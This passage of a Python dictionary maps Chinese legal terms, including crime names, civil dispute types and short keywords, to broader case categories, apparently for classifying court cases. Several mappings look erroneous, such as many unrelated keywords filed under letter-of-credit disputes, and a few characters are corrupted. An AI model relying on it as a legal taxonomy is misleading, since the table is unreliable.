u'破坏社会主义市场经济秩序罪',\r\n u'利用极端主义破坏法律实施罪': u'危害公共安全罪',\r\n u'阻碍军事行动罪': u'危害国防利益罪',\r\n u'非法经营同类营业罪': u'破坏社会主义市场经济秩序罪',\r\n u'破坏交通工具罪': u'危害公共安全罪',\r\n u'海事请求担保纠纷': u'海事海商纠纷',\r\n u'非法获取军事秘密罪': u'军人违反职责罪',\r\n u'组织、利用会道门、邪教组织、利用迷信破坏法律实施罪': u'妨害社会管理秩序罪',\r\n u'妨害国境卫生检疫罪': u'妨害社会管理秩序罪',\r\n u'隐瞒、谎报军情罪': u'军人违反职责罪',\r\n u'取舍权': u'用益物权纠纷',\r\n u'确认不侵害专利权纠纷': u'知识产权权属侵权纠纷',\r\n u'行使撤销权': u'合同纠纷',\r\n u'擅自出卖、转让军队房地产罪': u'军人违反职责罪',\r\n u'破坏集会、游行、示威罪': u'妨害社会管理秩序罪',\r\n u'知识产权质押合同纠纷': u'知识产权合同纠纷',\r\n u'存单质权纠纷': u'担保物权纠纷',\r\n u'供用热力': u'合同纠纷',\r\n u'股票': u'信用证纠纷',\r\n u'进出口押汇': u'合同纠纷',\r\n u'提供劳务者致害责任纠纷': u'侵权责任纠纷',\r\n u'确认收养关系纠纷': u'婚姻家庭纠纷',\r\n u'非法转让、倒卖土地使用权罪': u'破坏社会主义市场经济秩序罪',\r\n u'诉前': u'申请诉前停止侵害知识产权案件',\r\n u'妨害清算罪': u'破坏社会主义市场经济秩���罪',\r\n u'证券虚假': u'证券纠纷',\r\n u'发明专利临时保护期使用费纠纷': u'知识产权权属侵权纠纷',\r\n u'信用证诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'共有权确认纠纷': u'所有权纠纷',\r\n u'商标权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'被撤销死亡宣告人请求返还财产纠纷': u'宣告失踪、宣告死亡案件',\r\n u'假冒注册商标罪': u'破坏社会主义市场经济秩序罪',\r\n u'农村建房施工合同纠纷': u'合同纠纷',\r\n u'存管': u'证券纠纷',\r\n u'窃取、收买、非法提供信用卡信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'船舶建造合同纠纷': u'海事海商纠纷',\r\n u'网络域名权属纠纷': u'知识产权权属侵权纠纷',\r\n u'隐藏物返还纠纷': u'所有权纠纷',\r\n u'失业保险待遇纠纷': u'劳动争议',\r\n u'非法携带枪支、弹药、管制刀具、危险物品危及公共安全罪': u'危害公共安全罪',\r\n u'企业租赁经营合同纠纷': u'与企业有关的纠纷',\r\n u'过户': u'所有权纠纷',\r\n u'义务帮工人受害责任纠纷': u'侵权责任纠纷',\r\n u'引诱未成年人聚众淫乱罪': u'妨害社会管理秩序罪',\r\n u'意外伤害': u'信用证纠纷',\r\n u'专利代理合同纠纷': u'知识产权合同纠纷',\r\n u'企业名称(商号)合同纠纷': u'知识产权合同纠纷',\r\n u'打捞': u'海事海商纠纷',\r\n u'诈骗罪': u'侵犯财产罪',\r\n u'商标权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权确认纠纷': u'用益物权纠纷',\r\n u'决水罪': u'危害公共安全罪',\r\n u'复制权': u'知识产权权属侵权纠纷',\r\n u'技术中介': u'知识产权合同纠纷',\r\n u'房地产开发经营': u'合同纠纷',\r\n u'销售侵权复制品罪': u'破坏社会主义市场经济秩序罪',\r\n u'职工破产债权确认纠纷': u'与破产有关的纠纷',\r\n u'证券欺诈责任纠纷': u'证券纠纷',\r\n u'广播电视播放': u'知识产权合同纠纷',\r\n u'共有纠纷': u'所有权纠纷',\r\n u'操纵证券、期货市场罪': u'破坏社会主义市场经济秩序罪',\r\n u'商检失职罪': u'渎职罪',\r\n u'股权': u'信用证纠纷',\r\n u'恢复限制': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'保险费纠纷': u'保险纠纷',\r\n u'铁路包裹': u'合同纠纷',\r\n u'集成电路布图设计专有权转让合同纠纷': u'知识产权合同纠纷',\r\n u'捕捞权纠纷': u'用益物权纠纷',\r\n u'盈余分配': u'与公司有关的纠纷',\r\n u'商标代理': u'知识产权合同纠纷',\r\n u'非法获取国家秘密罪': u'妨害社会管理秩序罪',\r\n u'经营者': u'垄断纠纷',\r\n u'民间借贷': u'合同纠纷',\r\n u'商业贿赂不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'虐待被监护、看护人罪': u'侵犯公民人身权利、民主权利罪',\r\n u'音像制品': u'知识产权权属侵权纠纷',\r\n u'船舶经营管理合同纠纷': u'海事海商纠纷',\r\n u'租赁合同纠纷': u'合同纠纷',\r\n u'发现权纠纷': u'知识产权权属侵权纠纷',\r\n u'伪造、变造、买卖国家机关公文、证件、印章罪': u'妨害社会管理秩序罪',\r\n u'退伙': u'信用证纠纷',\r\n u'企业出售合同纠纷': u'与企业有关的纠纷',\r\n u'盈余': u'信用证纠纷',\r\n u'建设用地使用权转让合同': u'合同纠纷',\r\n u'过失损坏武器装备、军事设施、军事通信罪': u'危害国防利益罪',\r\n u'辩护人、诉讼代理人毁灭证据、伪造证据、妨害作证罪': u'妨害社会管理秩序罪',\r\n u'非法侵入计算机信息系统罪': u'妨害社会管理秩序罪',\r\n u'法定继承纠纷': u'继承纠纷',\r\n u'失职致使在押人员脱逃罪': u'渎职罪',\r\n u'拒不执行判决、裁定罪': u'妨害社会管理秩序罪',\r\n u'租赁协议': u'合同纠纷',\r\n u'证券登记存管结算纠纷': u'证券纠纷',\r\n u'身体': u'人格权纠纷',\r\n u'铁路货物运输合同纠纷': u'合同纠纷',\r\n u'收回': u'行政管理与行政行为',\r\n u'非法捕捞水产品罪': u'妨害社会管理秩序罪',\r\n u'破坏武器装备、军事设施、军事通信罪': u'危害国防利益罪',\r\n u'工资': u'劳动争议',\r\n u'公司决议': u'信用证纠纷',\r\n u'保管合同': u'合同纠纷',\r\n u'专利合同纠纷': u'知识产权合同纠纷',\r\n u'保管合同纠纷': u'合同纠纷',\r\n u'出版者权': u'知识产权权属侵权纠纷',\r\n u'专利合同': u'知识产权合同纠纷',\r\n u'光船租赁合同纠纷': u'海事海商纠纷',\r\n u'侵害特殊标志专有权纠纷': u'知识产权权属侵权纠纷',\r\n u'欺诈客户责任纠纷': u'证券纠纷',\r\n u'认购': u'与公司有��的纠纷',\r\n u'特许经营': u'知识产权权属侵权纠纷',\r\n u'赡养': u'婚姻家庭纠纷',\r\n u'海关知识产权': u'知识产权权属侵权纠纷',\r\n u'铁路行李运输合同纠纷': u'合同纠纷',\r\n u'广播': u'知识产权权属侵权纠纷',\r\n u'非法剥夺公民宗教信仰自由罪': u'侵犯公民人身权利、民主权利罪',\r\n u'记载': u'信用证纠纷',\r\n u'股东知情权纠纷': u'与公司有关的纠纷',\r\n u'交通事故': u'侵权责任纠纷',\r\n u'返还': u'合同纠纷',\r\n u'著作权转让合同纠纷': u'知识产权合同纠纷',\r\n u'著作权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'集成电路布图设计许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'借贷': u'合同纠纷',\r\n u'海上通海水域保赔合同纠纷': u'海事海商纠纷',\r\n u'房屋拆迁安置': u'合同纠纷',\r\n u'违反安全保障义务责任纠纷': u'侵权责任纠纷',\r\n u'虐待俘虏罪': u'军人违反职责罪',\r\n u'包销': u'证券纠纷',\r\n u'国际铁路联运合同纠纷': u'合同纠纷',\r\n u'航空货物运输合同纠纷': u'合同纠纷',\r\n u'拒不支付劳动报酬罪': u'侵犯财产罪',\r\n u'提供虚假证明文件罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司减资': u'与公司有关的纠纷',\r\n u'建设用地使用权出让合同': u'合同纠纷',\r\n u'违法': u'行政管理与行政行为',\r\n u'供用气': u'合同纠纷',\r\n u'虐待部属罪': u'军人违反职责罪',\r\n u'航次': u'海事海商纠纷',\r\n u'船舶权属纠纷': u'海事海商纠纷',\r\n u'过失致人死亡罪': u'侵犯公民人身权利、民主权利罪',\r\n u'海上通海水域保险合同纠纷': u'海事海商纠纷',\r\n u'铁路货物': u'合同纠纷',\r\n u'走私核材料罪': u'破坏社会主义市场经济秩序罪',\r\n u'货运代理': u'合同纠纷',\r\n u'商标权转让合同纠纷': u'知识产权合同纠纷',\r\n u'申请认定财产无主': u'认定财产无主案件',\r\n u'汇票': u'信用证纠纷',\r\n u'证券投资咨询纠纷': u'证券纠纷',\r\n u'商品房委托代理销售合同纠纷': u'合同纠纷',\r\n u'非法组织卖血罪': u'妨害社会管理秩序罪',\r\n u'刑讯逼供罪': u'侵犯公民人身权利、民主权利罪',\r\n u'航空货物运输': u'合同纠纷',\r\n u'管道运输合同纠纷': u'合同纠纷',\r\n u'软件著作权': u'知识产权权属侵权纠纷',\r\n u'枉法仲裁罪': u'渎职罪',\r\n u'清偿': u'信用证纠纷',\r\n u'返还电费': u'合同纠纷',\r\n u'采矿权转让合同纠纷': u'合同纠纷',\r\n u'劳务合同纠纷': u'合同纠纷',\r\n u'申请公司清算': u'与公司有关的纠纷',\r\n u'债务转移': u'合同纠纷',\r\n u'组织他人偷越国(边)境罪': u'妨害社会管理秩序罪',\r\n u'申请认可和执行': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'集成电路布图设计专有权': u'知识产权权属侵权纠纷',\r\n u'合伙企业财产份额转让纠纷': u'合伙企业纠纷',\r\n u'妨害作证罪': u'妨害社会管理秩序罪',\r\n u'重整': u'与破产有关的纠纷',\r\n u'遗失物返还': u'所有权纠纷',\r\n u'邻接权许可': u'知识产权合同纠纷',\r\n u'质权纠纷': u'担保物权纠纷',\r\n u'技术进口': u'知识产权合同纠纷',\r\n u'生育': u'劳动争议',\r\n u'运输合同纠纷': u'合同纠纷',\r\n u'虚开发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'滥用': u'垄断纠纷',\r\n u'侵犯公民个人信息罪': u'侵犯公民人身权利、民主权利罪',\r\n u'诋毁': u'不正当竞争纠纷',\r\n u'职务发明创造发明人设计人奖励报酬纠纷': u'知识产权权属侵权纠纷',\r\n u'申请执行人执行异议之诉': u'执行异议之诉',\r\n u'申请认可和执行澳门特别行政区仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'强迫他人吸毒罪': u'妨害社会管理秩序罪',\r\n u'专利申请权': u'知识产权权属侵权纠纷',\r\n u'掩饰、隐瞒犯罪所得、犯罪所得收益罪': u'妨害社会管理秩序罪',\r\n u'悬赏广告纠纷': u'合同纠纷',\r\n u'治安管理': u'行政管理与行政行为',\r\n u'作品': u'知识产权权属侵权纠纷',\r\n u'运输船舶承包': u'海事海商纠纷',\r\n u'掠夺定价纠纷': u'垄断纠纷',\r\n u'占有、使用高度危险物损害责任纠纷': u'侵权责任纠纷',\r\n u'选民': u'宣告失踪、宣告死亡案件',\r\n u'著作权民事纠纷': u'知识产权权属侵权纠纷',\r\n u'委托开立信用证纠纷': u'信用证纠纷',\r\n u'国有土地使用权处理决定': u'行政管理与行政行为',\r\n u'表演者权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'展览': u'合同纠纷',\r\n u'公共场所管理人责任纠纷': u'侵权责任纠纷',\r\n u'破坏界碑、界桩罪': u'妨害社会管理秩序罪',\r\n u'托管': u'信用证纠纷',\r\n u'扰乱法庭秩序罪': u'妨害社会管理秩序罪',\r\n u'财会服务': u'合同纠纷',\r\n u'医疗事故罪': u'妨害社会管理秩序罪',\r\n u'申请宣告公民死亡': u'宣告失踪、宣告死亡案件',\r\n u'侵害作品广播权纠纷': u'知识产权权属侵权纠纷',\r\n u'出租汽车运输': u'合同纠纷',\r\n u'海洋开发利用纠纷': u'海事海商纠纷',\r\n u'请求撤销个别清偿行为纠纷': u'与破产有关的纠纷',\r\n u'期货内幕': u'期货交易纠纷',\r\n u'铁路运输损害责任纠纷': u'侵权责任纠纷',\r\n u'产品责任纠纷': u'侵权责任纠纷',\r\n u'渔业承包合同纠纷': u'合同纠纷',\r\n u'逃汇罪': u'破坏社会主义市场经济秩序罪',\r\n u'煽动民族仇恨、民族歧视罪': u'侵犯公民人身权利、民主权利罪',\r\n u'发起人': u'信用证纠纷',\r\n u'重大劳动安全事故罪': u'危害公共安全罪',\r\n u'赠与合同': u'合同纠纷',\r\n u'城市公交运输合同纠纷': u'合同纠纷',\r\n u'收购': u'信用证纠纷',\r\n u'分家析产纠纷': u'婚姻家庭纠纷',\r\n u'离婚后财产纠纷': u'婚姻家庭纠纷',\r\n u'武装叛乱、暴乱罪': u'危害国家安全罪',\r\n u'建设工程设计合同纠纷': u'合同纠纷',\r\n u'污染环境罪': u'妨害社会管理秩序罪',\r\n u'建设工程勘察合同纠纷': u'合同纠纷',\r\n u'房屋': u'所有权纠纷',\r\n u'技术秘密许可': u'知识产权合同纠纷',\r\n u'货运代理合同纠纷': u'合同纠纷',\r\n u'质押合同纠纷': u'合同纠纷',\r\n u'高度危险': u'侵权责任纠纷',\r\n u'信用卡诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'再保险': u'保险纠纷',\r\n u'出售出入境证件罪': u'妨害社会管理秩序罪',\r\n u'保证保险合同纠纷': u'保险纠纷',\r\n u'保险经纪': u'保险纠纷',\r\n u'建筑工程': u'合同纠纷',\r\n u'公益事业捐赠合同纠纷': u'合同纠纷',\r\n u'保安服务': u'合同纠纷',\r\n u'公路货物运输合同纠纷': u'合同纠纷',\r\n u'共有物': u'所有权纠纷',\r\n u'疏浚': u'海事海商纠纷',\r\n u'共有人优先购买权纠纷': u'所有权纠纷',\r\n u'争议': u'信用证纠纷',\r\n u'银行结算': u'合同纠纷',\r\n u'技术合作开发合同纠纷': u'知识产权合同纠纷',\r\n u'水污染责任纠纷': u'侵权责任纠纷',\r\n u'投放虚假危险物质罪': u'妨害社会管理秩序罪',\r\n u'股东出资': u'信用证纠纷',\r\n u'婚约': u'婚姻家庭纠纷',\r\n u'人民调解协议': u'合同纠纷',\r\n u'股东损害': u'与公司有关的纠纷',\r\n u'船舶检验合同纠纷': u'海事海商纠纷',\r\n u'行贿罪': u'贪污贿赂罪',\r\n u'遗失武器装备罪': u'军人违反职责罪',\r\n u'生产、销售不符合安全标准的产品罪': u'破坏社会主义市场经济秩序罪',\r\n u'过失以危险方法危害公共安全罪': u'危害公共安全罪',\r\n u'票据质权纠纷': u'担保物权纠纷',\r\n u'横向垄断协议纠纷': u'垄断纠纷',\r\n u'公司设立纠纷': u'与公司有关的纠纷',\r\n u'家政服务': u'合同纠纷',\r\n u'海事债权': u'海事海商纠纷',\r\n u'因申请知识产权临时措施损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'走私贵重金属罪': u'破坏社会主义市场经济秩序罪',\r\n u'海域使用权': u'用益物权纠纷',\r\n u'淫秽': u'妨害社会管理秩序罪',\r\n u'占有消除危险纠纷': u'占有保护纠纷',\r\n u'公益信托纠纷': u'信托纠纷',\r\n u'虚假宣传': u'不正当竞争纠纷',\r\n u'放行偷越国(边)境人员罪': u'渎职罪',\r\n u'爆炸罪': u'危害公共安全罪',\r\n u'商标合同': u'知识产权合同纠纷',\r\n u'共有权确认': u'所有权纠纷',\r\n u'车库纠纷': u'所有权纠纷',\r\n u'多式联运': u'合同纠纷',\r\n u'离退休': u'合同纠纷',\r\n u'建设工程': u'合同纠纷',\r\n u'确认仲裁': u'仲裁程序案件',\r\n u'请求确认人民调解协议效力': u'合同纠纷',\r\n u'建设用地使用权合同纠纷': u'合同纠纷',\r\n u'采矿权': u'用益物权纠纷',\r\n u'抢夺罪': u'侵犯财产罪',\r\n u'别除': u'与破产有关的纠纷',\r\n u'建设工程监理合同纠纷': u'合同纠纷',\r\n u'表演者': u'知识产权权属侵权纠纷',\r\n u'生产、销售假药罪': u'破坏社会主义市场经济秩序罪',\r\n u'外商独资企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'侵害企业出资人权益纠纷': u'与企业有关的纠纷',\r\n u'低价倾销': u'不正当竞争纠纷',\r\n u'贷款纠纷': u'合同纠纷',\r\n u'机动���': u'侵权责任纠纷',\r\n u'票据追索权纠纷': u'票据纠纷',\r\n u'海商': u'海事海商纠纷',\r\n u'组织、利用会道门、邪教组织、利用迷信致人重伤、死亡罪': u'妨害社会管理秩序罪',\r\n u'荣誉权纠纷': u'人格权纠纷',\r\n u'股权转让': u'信用证纠纷',\r\n u'技术合作': u'知识产权权属侵权纠纷',\r\n u'确认不侵害知识产权纠纷': u'知识产权权属侵权纠纷',\r\n u'不动产登记': u'不动产登记纠纷',\r\n u'期货内幕交易责任纠纷': u'期货交易纠纷',\r\n u'伪造、变造、买卖武装部队公文、证件、印章罪': u'危害国防利益罪',\r\n u'撤销房产证': u'行政管理与行政行为',\r\n u'医疗合作': u'合同纠纷',\r\n u'用人单位责任纠纷': u'侵权责任纠纷',\r\n u'过失损坏易燃易爆设备罪': u'危害公共安全罪',\r\n u'海事担保': u'海事海商纠纷',\r\n u'水路货物运输': u'合同纠纷',\r\n u'进出口信用保险': u'保险纠纷',\r\n u'产品': u'侵权责任纠纷',\r\n u'职务侵占罪': u'侵犯财产罪',\r\n u'分立': u'信用证纠纷',\r\n u'违法运用资金罪': u'破坏社会主义市场经济秩序罪',\r\n u'土壤污染责任纠纷': u'侵权责任纠纷',\r\n u'采集、供应血液、制作、供应血液制品事故罪': u'妨害社会管理秩序罪',\r\n u'侵害集体经济组织成员权益纠纷': u'所有权纠纷',\r\n u'人身自由权纠纷': u'人格权纠纷',\r\n u'登记': u'行政管理与行政行为',\r\n u'伪证罪': u'妨害社会管理秩序罪',\r\n u'船舶买卖合同纠纷': u'海事海商纠纷',\r\n u'电信服务': u'合同纠纷',\r\n u'著作权归属': u'知识产权权属侵权纠纷',\r\n u'不正当竞争': u'不正当竞争纠纷',\r\n u'车辆租赁合同纠纷': u'合同纠纷',\r\n u'海事证据保全': u'海事诉讼特别程序案件',\r\n u'债权转让合同纠纷': u'合同纠纷',\r\n u'生产、销售伪劣产品罪': u'破坏社会主义市场经济秩序罪',\r\n u'出售、购买、运输假币罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司分立': u'与公司有关的纠纷',\r\n u'商品房预售合同纠纷': u'合同纠纷',\r\n u'申请中止支付信用证项下款项': u'申请保全案件',\r\n u'补偿贸易纠纷': u'合同纠纷',\r\n u'侵害作品发行权纠纷': u'知识产权权属侵权纠纷',\r\n u'所有权确认纠纷': u'物权保护纠纷',\r\n u'动植物检疫失职罪': u'渎职罪',\r\n u'披露、报道不应公开的案件信息罪': u'妨害社会管理秩序罪',\r\n u'运输': u'合同纠纷',\r\n u'徇私枉法罪': u'渎职罪',\r\n u'危险驾驶罪': u'危害公共安全罪',\r\n u'船舶修理合同纠纷': u'海事海商纠纷',\r\n u'用人': u'劳动争议',\r\n u'植物新品种权权属': u'知识产权权属侵权纠纷',\r\n u'银行卡': u'合同纠纷',\r\n u'兑付': u'信用证纠纷',\r\n u'确认合同': u'合同纠纷',\r\n u'著作权许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'码头': u'海事海商纠纷',\r\n u'海': u'海事海商纠纷',\r\n u'公司制': u'与企业有关的纠纷',\r\n u'过失损坏交通设施罪': u'危害公共安全罪',\r\n u'水路旅客运输': u'合同纠纷',\r\n u'侵犯通信自由罪': u'侵犯公民人身权利、民主权利罪',\r\n u'合作开发房地产': u'合同纠纷',\r\n u'旅店服务合同纠纷': u'合同纠纷',\r\n u'申请扣押船舶': u'海事诉讼特别程序案件',\r\n u'侵权损害赔偿': u'侵权责任纠纷',\r\n u'非全日制用工纠纷': u'劳动争议',\r\n u'大气污染责任纠纷': u'侵权责任纠纷',\r\n u'电信服务合同纠纷': u'合同纠纷',\r\n u'申请拍卖扣押船舶': u'海事诉讼特别程序案件',\r\n u'抵押合同纠纷': u'合同纠纷',\r\n u'不履行': u'行政管理与行政行为',\r\n u'债务人行为无': u'与破产有关的纠纷',\r\n u'商品房预约合同纠纷': u'合同纠纷',\r\n u'隐匿、故意销毁会计凭证、会计帐簿、财务会计报告罪': u'破坏社会主义市场经济秩序罪',\r\n u'军人叛逃罪': u'军人违反职责罪',\r\n u'妨害动植物防疫、检疫罪': u'妨害社会管理秩序罪',\r\n u'非法制造、买卖、运输、储存危险物质罪': u'危害公共安全罪',\r\n u'土地租赁': u'合同纠纷',\r\n u'走私、贩卖、运输、制造毒品罪': u'妨害社会管理秩序罪',\r\n u'担保物权确认纠纷': u'物权保护纠纷',\r\n u'社会保险': u'劳动争议',\r\n u'保全': u'申请保全案件',\r\n u'管理人责任纠纷': u'与破产有关的纠纷',\r\n u'环境保护': u'侵权责任纠纷',\r\n u'订作': u'合同纠纷',\r\n u'触电': u'侵权责任纠纷',\r\n u'虚假诉讼罪': u'妨害社会管理秩序罪',\r\n u'故意泄露国家秘密罪': u'渎职罪',\r\n u'专利权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'出资人': u'与企业有关的纠纷',\r\n u'设立': u'信用证纠纷',\r\n u'暴力干涉婚姻自由罪': u'侵犯公民人身权利、民主权利罪',\r\n u'国家机关工作人员签订、履行合同失职被骗罪': u'渎职罪',\r\n u'公司盈余分配纠纷': u'与公司有关的纠纷',\r\n u'抢劫枪支、弹药、爆炸物、危险物质罪': u'危害公共安全罪',\r\n u'虚假广告罪': u'破坏社会主义市场经济秩序罪',\r\n u'金融借款': u'合同纠纷',\r\n u'海上通海水域旅客运输合同纠纷': u'海事海商纠纷',\r\n u'航空运输财产损害责任纠纷': u'侵权责任纠纷',\r\n u'监护人': u'监护权特别程序案件',\r\n u'过失损坏交通工具罪': u'危害公共安全罪',\r\n u'环境监管失职罪': u'渎职罪',\r\n u'证券投资基金交易纠纷': u'证券纠纷',\r\n u'减资': u'信用证纠纷',\r\n u'有价证券诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'注册商标专用权': u'知识产权权属侵权纠纷',\r\n u'走私文物罪': u'破坏社会主义市场经济秩序罪',\r\n u'传染病菌种、毒种扩散罪': u'妨害社会管理秩序罪',\r\n u'骗取出境证件罪': u'妨害社会管理秩序罪',\r\n u'借记卡纠纷': u'合同纠纷',\r\n u'撤销婚姻纠纷': u'婚姻家庭纠纷',\r\n u'撤销建设工程': u'行政管理与行政行为',\r\n u'因申请诉前停止侵害植物新品种权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'票据返还请求权纠纷': u'票据纠纷',\r\n u'建设用地使用权': u'用益物权纠纷',\r\n u'植物新品种申请权转让合同纠纷': u'知识产权合同纠纷',\r\n u'船舶属具保管合同纠纷': u'海事海商纠纷',\r\n u'擅离、玩忽军事职守罪': u'军人违反职责罪',\r\n u'侵害作品表演权纠纷': u'知识产权权属侵权纠纷',\r\n u'分裂国家罪': u'危害国家安全罪',\r\n u'姓名权纠纷': u'人格权纠纷',\r\n u'庆典服务': u'合同纠纷',\r\n u'国际货物': u'合同纠纷',\r\n u'技术合同': u'知识产权合同纠纷',\r\n u'财产损害赔偿纠纷': u'物权保护纠纷',\r\n u'广告': u'合同纠纷',\r\n u'证券上市': u'证券纠纷',\r\n u'企业债权转股权合同纠纷': u'与企业有关的纠纷',\r\n u'垄断': u'垄断纠纷',\r\n u'赠与合同纠纷': u'合同纠纷',\r\n u'破坏计算机信息系统罪': u'妨害社会管理秩序罪',\r\n u'资助危害国家安全犯罪活动罪': u'危害国家安全罪',\r\n u'聚众哄抢罪': u'侵犯财产罪',\r\n u'建筑物区分所有权': u'所有权纠纷',\r\n u'保险代理合同纠纷': u'保险纠纷',\r\n u'物权确认纠纷': u'物权保护纠纷',\r\n u'劳务派遣合同纠纷': u'劳动争议',\r\n u'法律': u'合同纠纷',\r\n u'实用新型专利实施': u'知识产权合同纠纷',\r\n u'中外合作经营企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'非法批准征收、征用、占用土地罪': u'渎职罪',\r\n u'仓单质权纠纷': u'担保物权纠纷',\r\n u'养殖': u'合同纠纷',\r\n u'管道运输': u'合同纠纷',\r\n u'企业借贷': u'合同纠纷',\r\n u'集成电路布图设计专有权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'海上通海水域运输船舶承包合同纠纷': u'海事海商纠纷',\r\n u'技术出口合同纠纷': u'知识产权合同纠纷',\r\n u'建设用地使用权出让合同纠纷': u'合同纠纷',\r\n u'强制穿戴宣扬恐怖主义、极端主义服饰、标志罪': u'危害公共安全罪',\r\n u'音像制品制作合同纠纷': u'知识产权合同纠纷',\r\n u'社会保障': u'劳动争议',\r\n u'行纪合同纠纷': u'合同纠纷',\r\n u'准备实施恐怖活动罪': u'危害公共安全罪',\r\n u'打击报复证人罪': u'妨害社会管理秩序罪',\r\n u'商品房销售': u'合同纠纷',\r\n u'诉讼仲裁人民调解代理合同纠纷': u'合同纠纷',\r\n u'紧急避险损害责任纠纷': u'侵权责任纠纷',\r\n u'物件损害责任纠纷': u'侵权责任纠纷',\r\n u'驻香港、澳门特别行政区军人执行职务侵权责任纠纷': u'侵权责任纠纷',\r\n u'拍卖合同纠纷': u'合同纠纷',\r\n u'作品发行': u'知识产权权属侵权纠纷',\r\n u'作品完整': u'知识产权权属侵权纠纷',\r\n u'编造并传播证券、期货交易虚假信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请诉前停止侵害植物新品种权': u'申请诉前停止侵害知识产权案件',\r\n u'船舶拆解合同纠纷': u'海事海商纠纷',\r\n u'罚款': u'行政管理与行政行为',\r\n u'破坏监管秩序罪': u'妨害社会管理秩序罪',\r\n u'委托创作合同纠纷': u'知识产权合同纠纷',\r\n u'走私淫秽物品罪': u'破坏社会主义市场���济秩序罪',\r\n u'仲裁程序中': u'申请保全案件',\r\n u'凭样品买卖合同纠纷': u'合同纠纷',\r\n u'建设用地使用权纠纷': u'用益物权纠纷',\r\n u'侵害实用新型专利权': u'知识产权权属侵权纠纷',\r\n u'动植物检疫徇私舞弊罪': u'渎职罪',\r\n u'异议登记不当损害责任纠纷': u'不动产登记纠纷',\r\n u'汇票回单签发请求权纠纷': u'票据纠纷',\r\n u'水路旅客运输合同纠纷': u'合同纠纷',\r\n u'案外人执行异议之诉': u'执行异议之诉',\r\n u'占有': u'占有保护纠纷',\r\n u'项目转让': u'合同纠纷',\r\n u'擅自设立金融机构罪': u'破坏社会主义市场经济秩序罪',\r\n u'为境外窃取、剌探、收买、非法提供军事秘密罪': u'军人违反职责罪',\r\n u'雇佣': u'劳动争议',\r\n u'公证损害责任纠纷': u'侵权责任纠纷',\r\n u'船舶优先权催告': u'海事诉讼特别程序案件',\r\n u'限定': u'垄断纠纷',\r\n u'票据保证纠纷': u'票据纠纷',\r\n u'逃离部队罪': u'军人违反职责罪',\r\n u'收养关系纠纷': u'婚姻家庭纠纷',\r\n u'挪用特定款物罪': u'侵犯财产罪',\r\n u'破产债权确认纠纷': u'与破产有关的纠纷',\r\n u'建设用地使用权转让合同纠纷': u'合同纠纷',\r\n u'婚约财产纠纷': u'婚姻家庭纠纷',\r\n u'装卸作业': u'合同纠纷',\r\n u'商标专用权': u'知识产权权属侵权纠纷',\r\n u'房地产咨询': u'合同纠纷',\r\n u'产权交易': u'知识产权权属侵权纠纷',\r\n u'遗失物返还纠纷': u'所有权纠纷',\r\n u'职务技术成果完成人奖励报酬纠纷': u'知识产权合同纠纷',\r\n u'港口作业重大责任事故责任纠纷': u'海事海商纠纷',\r\n u'融资租赁': u'合同纠纷',\r\n u'演出合同': u'合同纠纷',\r\n u'伪造公司、企业、事业单位、人民团体印章罪': u'妨害社会管理秩序罪',\r\n u'侵害作品发表权纠纷': u'知识产权权属侵权纠纷',\r\n u'著作权转让合同': u'知识产权合同纠纷',\r\n u'发明专利权': u'知识产权权属侵权纠纷',\r\n u'娱乐': u'合同纠纷',\r\n u'故意损毁文物罪': u'妨害社会管理秩序罪',\r\n u'代销': u'证券纠纷',\r\n u'提供劳务者受害责任纠纷': u'侵权责任纠纷',\r\n u'民用航空运输销售代理合同纠纷': u'合同纠纷',\r\n u'战时造谣扰乱军心罪': u'危害国防利益罪',\r\n u'聘用': u'人事争议',\r\n u'证照': u'信用证纠纷',\r\n u'饲养': u'侵权责任纠纷',\r\n u'申请承认和执行外国法院民事判决、裁定': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'违规披露、不披露重要信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'徇私舞弊不征、少征税款罪': u'渎职罪',\r\n u'土地承包经营权继承纠纷': u'用益物权纠纷',\r\n u'复函': u'行政管理与行政行为',\r\n u'国有公司、企业、事业单位人员滥用职权罪': u'破坏社会主义市场经济秩序罪',\r\n u'入伙': u'信用证纠纷',\r\n u'保险代位求偿': u'信用证纠纷',\r\n u'因申请诉中财产保全损害责任纠纷': u'侵权责任纠纷',\r\n u'供用热力合同纠纷': u'合同纠纷',\r\n u'破产抵销': u'与破产有关的纠纷',\r\n u'代位': u'信用证纠纷',\r\n u'非法采矿罪': u'妨害社会管理秩序罪',\r\n u'因申请知识产权临时措施': u'知识产权权属侵权纠纷',\r\n u'费用': u'合同纠纷',\r\n u'信用证融资纠纷': u'信用证纠纷',\r\n u'仓储合同': u'合同纠纷',\r\n u'海上': u'海事海商纠纷',\r\n u'确认不侵害著作权纠纷': u'知识产权权属侵权纠纷',\r\n u'基金': u'信用证纠纷',\r\n u'侵害外观设计专利权': u'知识产权权属侵权纠纷',\r\n u'产品质量损害': u'侵权责任纠纷',\r\n u'加工': u'合同纠纷',\r\n u'撤销工商变更': u'行政管理与行政行为',\r\n u'非全日制用工': u'劳动争议',\r\n u'土地承包经营': u'用益物权纠纷',\r\n u'骗取出口退税罪': u'破坏社会主义市场经济秩序罪',\r\n u'扰乱国家机关工作秩序罪': u'妨害社会管理秩序罪',\r\n u'垄断协议纠纷': u'垄断纠纷',\r\n u'证券上市保荐合同纠纷': 